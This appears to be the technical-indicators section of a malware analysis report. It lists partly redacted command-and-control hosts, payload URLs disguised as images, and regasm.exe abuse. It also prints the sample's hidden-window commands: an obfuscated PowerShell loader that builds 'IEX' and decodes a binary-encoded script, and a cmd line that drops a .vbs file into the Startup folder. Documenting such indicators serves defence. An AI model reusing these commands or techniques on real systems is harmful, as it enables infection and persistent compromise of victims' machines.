Technical Information
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- '3.##.185.34':80
- 'em###o.ddns.net':5050
- http://3.##.185.34/bb3.jpg
- http://3.##.185.34/bb1.jpg
- 'em###o.ddns.net':5050
- DNS ASK google.com
- DNS ASK em###o.ddns.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $t0='DE5'.replace('D','I').replace('5','x');sal g $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c move "<SYSTEM32>\<File name>.vbs" "<SYSTEM32>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $t0='DE5'.replace('D','I').replace('5','x');sal g $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101...
- '<SYSTEM32>\cmd.exe' /c move "<SYSTEM32>\<File name>.vbs" "<SYSTEM32>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'